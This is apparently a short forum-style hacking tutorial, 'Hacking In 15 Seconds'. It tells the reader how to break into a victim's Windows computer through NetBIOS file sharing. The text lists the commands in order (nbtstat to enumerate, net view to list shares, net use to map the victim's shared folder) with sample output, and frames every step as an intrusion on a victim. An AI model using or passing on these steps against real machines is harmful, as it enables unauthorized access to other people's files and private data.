Hacking In 15 Seconds!
Hacking In 15 Seconds!
If your victim possess certain security flaws then her system can be broken into in less that 15 seconds.
This is how : -
Click "Start -> Run -> cmd"
Type the following at the Dos Prompt
Code:
Nbtstat -A <IP address>
[e.g: nbtstat -A 207.175.1.1]
This will give you a read out that looks like this
Code: NetBIOS Remote Machine Name Table ____________________________________ Name Type Status ------------------------------------ abhi <00> UNIQUE Registered WORK <00> GROUP Registered abhi <03> UNIQUE Registered abhi <20> UNIQUE Registered WORK <1E> GROUP Registered WORK <1D> UNIQUE Registered __MSBROWSE__.<01>GROUP Registered ____________________________________
The numbers in the <> are hex code values. What we are
interested in is the “Hex Code- number of <20>.
A hex code of <20> means you have file and printer sharing turned on.
Next step is to find out what is being shared. This is how : -
Code: Net view \\<insert ip_address here>
You will then get a response that looks something like this.
Code:
Shared resources at \\ip_address Sharename Type Comment ______________________ MY DOCUMENTS Disk TEMP Disk ______________________
(The command was completed successfully.)
Code: Net use x: \\<insert IP address here>\temp
If all goes well for you, you will then get a response of
Code: (The command was completed successfully.) Open my computer you will see your victim's temp folder there
|